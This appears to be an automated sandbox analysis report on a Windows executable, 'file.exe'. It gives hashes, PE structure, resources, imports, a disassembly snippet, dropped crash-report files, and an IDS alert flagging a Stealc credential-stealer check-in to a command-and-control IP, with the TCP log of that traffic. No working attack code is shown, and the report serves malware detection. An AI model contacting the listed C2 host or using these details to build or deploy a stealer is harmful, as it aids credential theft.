                    Entropy (8bit):0.9527847250784605
                    Encrypted:false
                    SSDEEP:192:MI8H5EvkPlotQ0ueVnI3jpCZrMZVzuiFOZ24IO8TVB:tkN+rueVQjrbzuiFOY4IO8X
                    MD5:511107BF3E8A3442C510A256A7BDC9F3
                    SHA1:3D41422C96CAAABE8296387B789AD6C688227E05
                    SHA-256:6CD15709D6309E6B4D4D2013685568105A5FE88E6D6AEB6CDE8ECF3DB2FACCE6
                    SHA-512:B1334401337207A2A163B3EB17F3094DAD64EC64D7596AC9BE70DE4AF162A88E647EC50A3D76530D7100165D0FEA09520FB5CE1B2C1664C841B087AE4C827949
                    Malicious:true
                    Reputation:low
                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.6.3.3.2.6.0.4.9.2.8.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.7.6.3.3.2.6.5.3.3.6.3.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.1.5.4.4.5.e.-.d.2.0.b.-.4.2.7.d.-.9.d.1.c.-.d.a.a.d.7.4.b.f.4.3.0.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.1.d.2.6.f.c.-.b.3.6.7.-.4.6.a.a.-.9.7.6.8.-.3.0.0.e.a.9.3.4.7.b.b.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.9.4.-.0.0.0.1.-.0.0.1.4.-.5.c.f.e.-.d.f.9.c.7.a.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.c.b.6.3.4.1.3.a.c.5.3.4.d.d.4.2.1.c.4.e.d.e.1.5.2.f.c.b.6.7.8.1.4.9.c.0.0.a.4.7.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9.
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Mini DuMP crash report, 14 streams, Wed Sep 25 18:42:06 2024, 0x1205a4 type
                    Category:dropped
                    Size (bytes):66068
                    Entropy (8bit):2.0278578877621705
                    Encrypted:false
                    SSDEEP:384:hB3EbCdbLrFEEA4MBgjYa2eO/ZDMDARazMf:bEbCdbLrFEE6wz0VPBf
                    MD5:04423014A74D16C4B28845F06FA611AE
                    SHA1:84B445FB2483AB7B041D9722662A8C6D5340EBDB
                    SHA-256:828239D204EA287E925A1571D447EF7B244ABB1891C805F651EE20738B0E4ACB
                    SHA-512:29F476897C96B55DE30E697BB23DFD55C9D16C1C328C0D327FC797328C107FEECBFBE2ABC302D22CECC6A2490C7A5F632F51972883B91B381E5A544B8FFB3311
                    Malicious:false
                    Reputation:low
                    Preview:MDMP..a..... .......~Y.f............4...............<............*..........T.......8...........T............3..........................................................................................................eJ......H.......GenuineIntel............T...........zY.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):8304
                    Entropy (8bit):3.6894462187901165
                    Encrypted:false
                    SSDEEP:192:R6l7wVeJ5CW6qhfv6Y9NSU9gRztgmfBi4HupDM89b5Nsfkzm:R6lXJ966fv6YnSU9gfgmfvHK5GfN
                    MD5:2051001F5C6149B7F78C2350FF6305F4
                    SHA1:FE49C675D2CC32FBDB6CD1F317373505544FC799
                    SHA-256:21D8EF95B04D391BA92B4D037DCF9CC5D343D2B7E13A380258A9B7601E4A3AE6
                    SHA-512:6DD1944B1EFD3A20355CB0077D320C4F437971FBC62FB47AE7CF0CEAC25CD21E2801DB7331AE13F5A18FCB407A2CE1253B34F31DC2209667B7C596DD9BCED3AE
                    Malicious:false
                    Reputation:low
                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.3.6.<./.P.i.
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):4537
                    Entropy (8bit):4.421367111140765
                    Encrypted:false
                    SSDEEP:48:cvIwWl8zsVJg77aI9hkJWpW8VYjTu5Ym8M4JX/FD+q8eHySpuihQd:uIjfvI7Hk47VouoJZOSpuihQd
                    MD5:E9ED552672CA55781ED20EB48D794C72
                    SHA1:58A93A6F8D278598152FB861193A74987726BAC6
                    SHA-256:7CB879FD047534E6D5EB16CCF17F461CA972859FED00637025D3DD4325F3A16B
                    SHA-512:398C833209FC4F92D8E06D94277D7E9644473612A29A353DFB818EBD6CB8B20F1B1590B0219A61AACF976D96DA03108DEBC8709B71F177C1278F3239B83D3CD7
                    Malicious:false
                    Reputation:low
                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="516104" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:MS Windows registry file, NT/2000 or above
                    Category:dropped
                    Size (bytes):1835008
                    Entropy (8bit):4.465293126843899
                    Encrypted:false
                    SSDEEP:6144:QIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSb0:1XD94+WlLZMM6YFH1+0
                    MD5:E015892D9514054130FB3CCA2886A745
                    SHA1:D588CD4703D148EB7EA6403541E522454D8A1E50
                    SHA-256:EEBE40B1B2F137742C744EC7B9B42A65B1109054D3DE712A392B00882C82A3DD
                    SHA-512:C4930FEAD5632ADFFA19819F2E976F7B8AFD8C6DE98F7CDE5129CF31EB6DA1803C0295B32385F938AA5FCEA499A7C5294B37BC785F476A1C696616D129FA84E5
                    Malicious:false
                    Reputation:low
                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.m..z...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.852693968801178
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:418'816 bytes
                    MD5:df5444313433cc5c1126d41f68d71903
                    SHA1:cb63413ac534dd421c4ede152fcb678149c00a47
                    SHA256:8e39055538a72e61a512ed724904718edbddb544559d0b70bf5182440ca7723b
                    SHA512:20de07c228b1a637cef40d1d9c31bdd3c3b5192c6565df05679420ec751ffd581abbb39f85cefefff82dfdbcaad7fa4b3ad3f44ed3966779d26cc403bf3e4fcf
                    SSDEEP:6144:8gphHWBkzhFfkb9znPNI58cFzJ5InZkPP2lqmkK3O:Rph2BkzHfkVnPNIycFDInZkPP6hO
                    TLSH:26949E83B2D27C98E5224A328E3EF6E4775DF5618E19276A23586E1F04B2171F1BB710
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O..A............d.......d.).+...d...w.....$.............d.......d.-.....d.*.....Rich............................PE..L......e...
                    Icon Hash:45214155554d510d
                    Entrypoint:0x4037d3
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x65DF1995 [Wed Feb 28 11:31:33 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:7cc7d739955a11b33e2158d69886e250
                    Instruction
                    call 00007FCAFCE36491h
                    jmp 00007FCAFCE3293Eh
                    int3
                    int3
                    int3
                    call 00007FCAFCE32AECh
                    xchg cl, ch
                    jmp 00007FCAFCE32AD4h
                    call 00007FCAFCE32AE3h
                    fxch st(0), st(1)
                    jmp 00007FCAFCE32ACBh
                    fabs
                    fld1
                    mov ch, cl
                    xor cl, cl
                    jmp 00007FCAFCE32AC1h
                    mov byte ptr [ebp-00000090h], FFFFFFFEh
                    fabs
                    fxch st(0), st(1)
                    fabs
                    fxch st(0), st(1)
                    fpatan
                    or cl, cl
                    je 00007FCAFCE32AB6h
                    fldpi
                    fsubrp st(1), st(0)
                    or ch, ch
                    je 00007FCAFCE32AB4h
                    fchs
                    ret
                    fabs
                    fld st(0), st(0)
                    fld st(0), st(0)
                    fld1
                    fsubrp st(1), st(0)
                    fxch st(0), st(1)
                    fld1
                    faddp st(1), st(0)
                    fmulp st(1), st(0)
                    ftst
                    wait
                    fstsw word ptr [ebp-000000A0h]
                    wait
                    test byte ptr [ebp-0000009Fh], 00000001h
                    jne 00007FCAFCE32AB7h
                    xor ch, ch
                    fsqrt
                    ret
                    pop eax
                    jmp 00007FCAFCE3506Fh
                    fstp st(0)
                    fld tbyte ptr [004116AAh]
                    ret
                    fstp st(0)
                    or cl, cl
                    je 00007FCAFCE32ABDh
                    fstp st(0)
                    fldpi
                    or ch, ch
                    je 00007FCAFCE32AB4h
                    fchs
                    ret
                    fstp st(0)
                    fldz
                    or ch, ch
                    je 00007FCAFCE32AA9h
                    fchs
                    ret
                    fstp st(0)
                    jmp 00007FCAFCE35045h
                    fstp st(0)
                    mov cl, ch
                    jmp 00007FCAFCE32AB2h
                    call 00007FCAFCE32A7Eh
                    jmp 00007FCAFCE35050h
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push ebp
                    mov ebp, esp
                    add esp, FFFFFD30h
                    push ebx
                    Programming Language:
                    • [C++] VS2010 build 30319
                    • [ASM] VS2010 build 30319
                    • [ C ] VS2010 build 30319
                    • [IMP] VS2008 SP1 build 30729
                    • [RES] VS2010 build 30319
                    • [LNK] VS2010 build 30319
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x400ac0x64.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x205d0000x208d8.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x401100x1c.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3fc080x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x110000x22c.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000xf8f20xfa00eb101c95c20f2d7fa6b30799fdaa5bf3False0.6075625data6.752723660695789IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x110000x2fd380x2fe0028ea11d41157f8b02b81adb61424a6b6False0.9443690845300261Award BIOS Logo, 128 x 1267.8865121562756135IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x410000x201b2100x5e00e4605696a14180ea48f98d9724fa110eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x205d0000x208d80x20a0096e9a18ea0a34a41a6ef27cccbc738e9False0.4004879070881226data4.756387692109782IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    CERECUVIB0x20764880x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilIndia0.5897270021995084
                    CERECUVIB0x20764880x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilSri Lanka0.5897270021995084
                    RT_CURSOR0x20782f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.26439232409381663
                    RT_CURSOR0x20791a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3686823104693141
                    RT_CURSOR0x2079a480x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.49060693641618497
                    RT_CURSOR0x2079fe00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                    RT_CURSOR0x207a1100xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                    RT_CURSOR0x207a1e80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                    RT_CURSOR0x207b0900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                    RT_CURSOR0x207b9380x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                    RT_ICON0x205daf00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.43176972281449894
                    RT_ICON0x205daf00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.43176972281449894
                    RT_ICON0x205e9980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5351985559566786
                    RT_ICON0x205e9980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5351985559566786
                    RT_ICON0x205f2400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.5973502304147466
                    RT_ICON0x205f2400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.5973502304147466
                    RT_ICON0x205f9080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6741329479768786
                    RT_ICON0x205f9080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6741329479768786
                    RT_ICON0x205fe700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.3261410788381743
                    RT_ICON0x205fe700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.3261410788381743
                    RT_ICON0x20624180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilIndia0.4022045028142589
                    RT_ICON0x20624180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilSri Lanka0.4022045028142589
                    RT_ICON0x20634c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilIndia0.46475409836065573
                    RT_ICON0x20634c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilSri Lanka0.46475409836065573
                    RT_ICON0x2063e480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.5460992907801419
                    RT_ICON0x2063e480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.5460992907801419
                    RT_ICON0x20643280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.36727078891257997
                    RT_ICON0x20643280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.36727078891257997
                    RT_ICON0x20651d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4503610108303249
                    RT_ICON0x20651d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4503610108303249
                    RT_ICON0x2065a780x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.4602534562211982
                    RT_ICON0x2065a780x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.4602534562211982
                    RT_ICON0x20661400x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.46170520231213874
                    RT_ICON0x20661400x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.46170520231213874
                    RT_ICON0x20666a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2662863070539419
                    RT_ICON0x20666a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2662863070539419
                    RT_ICON0x2068c500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.30863039399624764
                    RT_ICON0x2068c500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.30863039399624764
                    RT_ICON0x2069cf80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.35904255319148937
                    RT_ICON0x2069cf80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.35904255319148937
                    RT_ICON0x206a1c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.5668976545842217
                    RT_ICON0x206a1c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.5668976545842217
                    RT_ICON0x206b0700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5505415162454874
                    RT_ICON0x206b0700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5505415162454874
                    RT_ICON0x206b9180x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.6177745664739884
                    RT_ICON0x206b9180x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.6177745664739884
                    RT_ICON0x206be800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.46348547717842326
                    RT_ICON0x206be800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.46348547717842326
                    RT_ICON0x206e4280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.48874296435272047
                    RT_ICON0x206e4280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.48874296435272047
                    RT_ICON0x206f4d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4934426229508197
                    RT_ICON0x206f4d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4934426229508197
                    RT_ICON0x206fe580x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.4521276595744681
                    RT_ICON0x206fe580x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.4521276595744681
                    RT_ICON0x20703280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.4904051172707889
                    RT_ICON0x20703280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.4904051172707889
                    RT_ICON0x20711d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.47021660649819497
                    RT_ICON0x20711d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.47021660649819497
                    RT_ICON0x2071a780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4356936416184971
                    RT_ICON0x2071a780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4356936416184971
                    RT_ICON0x2071fe00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.27728215767634856
                    RT_ICON0x2071fe00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.27728215767634856
                    RT_ICON0x20745880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.2893996247654784
                    RT_ICON0x20745880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.2893996247654784
                    RT_ICON0x20756300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.30901639344262294
                    RT_ICON0x20756300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.30901639344262294
                    RT_ICON0x2075fb80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.33687943262411346
                    RT_ICON0x2075fb80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.33687943262411346
                    RT_DIALOG0x207c1280x58data0.8977272727272727
                    RT_STRING0x207c1800x560dataTamilIndia0.436046511627907
                    RT_STRING0x207c1800x560dataTamilSri Lanka0.436046511627907
                    RT_STRING0x207c6e00x616dataTamilIndia0.43838254172015406
                    RT_STRING0x207c6e00x616dataTamilSri Lanka0.43838254172015406
                    RT_STRING0x207ccf80x352dataTamilIndia0.45529411764705885
                    RT_STRING0x207ccf80x352dataTamilSri Lanka0.45529411764705885
                    RT_STRING0x207d0500x4fcdataTamilIndia0.44905956112852663
                    RT_STRING0x207d0500x4fcdataTamilSri Lanka0.44905956112852663
                    RT_STRING0x207d5500x382dataTamilIndia0.4621380846325167
                    RT_STRING0x207d5500x382dataTamilSri Lanka0.4621380846325167
                    RT_ACCELERATOR0x20782c00x38dataTamilIndia0.9107142857142857
                    RT_ACCELERATOR0x20782c00x38dataTamilSri Lanka0.9107142857142857
                    RT_GROUP_CURSOR0x2079fb00x30data0.9375
                    RT_GROUP_CURSOR0x207a1c00x22data1.0588235294117647
                    RT_GROUP_CURSOR0x207bea00x30data0.9375
                    RT_GROUP_ICON0x20702c00x68dataTamilIndia0.7115384615384616
                    RT_GROUP_ICON0x20702c00x68dataTamilSri Lanka0.7115384615384616
                    RT_GROUP_ICON0x20642b00x76dataTamilIndia0.6610169491525424
                    RT_GROUP_ICON0x20642b00x76dataTamilSri Lanka0.6610169491525424
                    RT_GROUP_ICON0x206a1600x68dataTamilIndia0.7115384615384616
                    RT_GROUP_ICON0x206a1600x68dataTamilSri Lanka0.7115384615384616
                    RT_GROUP_ICON0x20764200x68dataTamilIndia0.7211538461538461
                    RT_GROUP_ICON0x20764200x68dataTamilSri Lanka0.7211538461538461
                    RT_VERSION0x207bed00x258data0.545
                    DLLImport
                    KERNEL32.dllEnumCalendarInfoW, InterlockedDecrement, GetCurrentProcess, SetEnvironmentVariableW, CreateJobObjectW, CreateHardLinkA, GetModuleHandleW, GetNumberFormatA, GetWindowsDirectoryA, SetCommState, LoadLibraryW, GetLocaleInfoW, ReadConsoleInputA, GetCalendarInfoW, SetVolumeMountPointA, GetConsoleAliasExesLengthW, GetVersionExW, GetFileAttributesA, EnumSystemCodePagesA, GetTimeFormatW, GetFileAttributesW, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, SetThreadPriority, GetTempPathW, GetShortPathNameA, VerifyVersionInfoW, GlobalUnfix, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetLongPathNameW, GetProcAddress, InterlockedIncrement, SetComputerNameA, LoadModule, GlobalFree, GetProcessVersion, LoadLibraryA, InterlockedExchangeAdd, CreateFileMappingA, LocalAlloc, SetCalendarInfoW, CreateEventW, FoldStringA, EnumDateFormatsA, GlobalUnWire, LoadLibraryExA, GetFileTime, WaitForDebugEvent, OpenEventW, SetProcessShutdownParameters, SetFileShortNameA, GetDiskFreeSpaceExW, EnumCalendarInfoExA, LCMapStringW, ReadFile, GetProcessHeap, SetEndOfFile, GetStringTypeW, MultiByteToWideChar, CreateFileW, WriteConsoleW, CommConfigDialogA, GetConsoleAliasExesA, TlsGetValue, SetFilePointer, CreateNamedPipeA, SetDefaultCommConfigA, FlushFileBuffers, SetStdHandle, HeapFree, EncodePointer, DecodePointer, HeapReAlloc, GetCommandLineW, HeapSetInformation, GetStartupInfoW, IsProcessorFeaturePresent, WideCharToMultiByte, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, HeapCreate, Sleep, HeapSize, ExitProcess, RtlUnwind, HeapAlloc, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA
                    USER32.dllGetWindowLongA, SetCaretPos, CharUpperA, InsertMenuItemW, DrawStateA, LoadMenuA, CharLowerBuffA, GetSysColor, GetMenuStringA, SetMenu
                    GDI32.dllGetBkMode, CreateDCW, GetCharWidth32W, GetTextCharset, GetCharWidthI
                    WINHTTP.dllWinHttpCloseHandle
                    Language of compilation systemCountry where language is spokenMap
                    TamilIndia
                    TamilSri Lanka
                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-09-25T20:42:05.878893+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730193.233.113.18480TCP
                    TimestampSource PortDest PortSource IPDest IP
                    Sep 25, 2024 20:42:04.528220892 CEST4973080192.168.2.4193.233.113.184
                    Sep 25, 2024 20:42:04.533154964 CEST8049730193.233.113.184192.168.2.4
                    Sep 25, 2024 20:42:04.533489943 CEST4973080192.168.2.4193.233.113.184
                    Sep 25, 2024 20:42:04.537493944 CEST4973080192.168.2.4193.233.113.184
                    Sep 25, 2024 20:42:04.542357922 CEST8049730193.233.113.184192.168.2.4
                    Sep 25, 2024 20:42:05.219647884 CEST8049730193.233.113.184192.168.2.4
                    Sep 25, 2024 20:42:05.219846010 CEST4973080192.168.2.4193.233.113.184
                    Sep 25, 2024 20:42:05.660185099 CEST4973080192.168.2.4193.233.113.184
                    Sep 25, 2024 20:42:05.665108919 CEST8049730193.233.113.184192.168.2.4
                    Sep 25, 2024 20:42:05.878762007 CEST8049730193.233.113.184192.168.2.4
                    Sep 25, 2024 20:42:05.878892899 CEST4973080192.168.2.4193.233.113.184
                    Sep 25, 2024 20:42:10.883960009 CEST8049730193.233.113.184192.168.2.4
                    Sep 25, 2024 20:42:10.884064913 CEST4973080192.168.2.4193.233.113.184
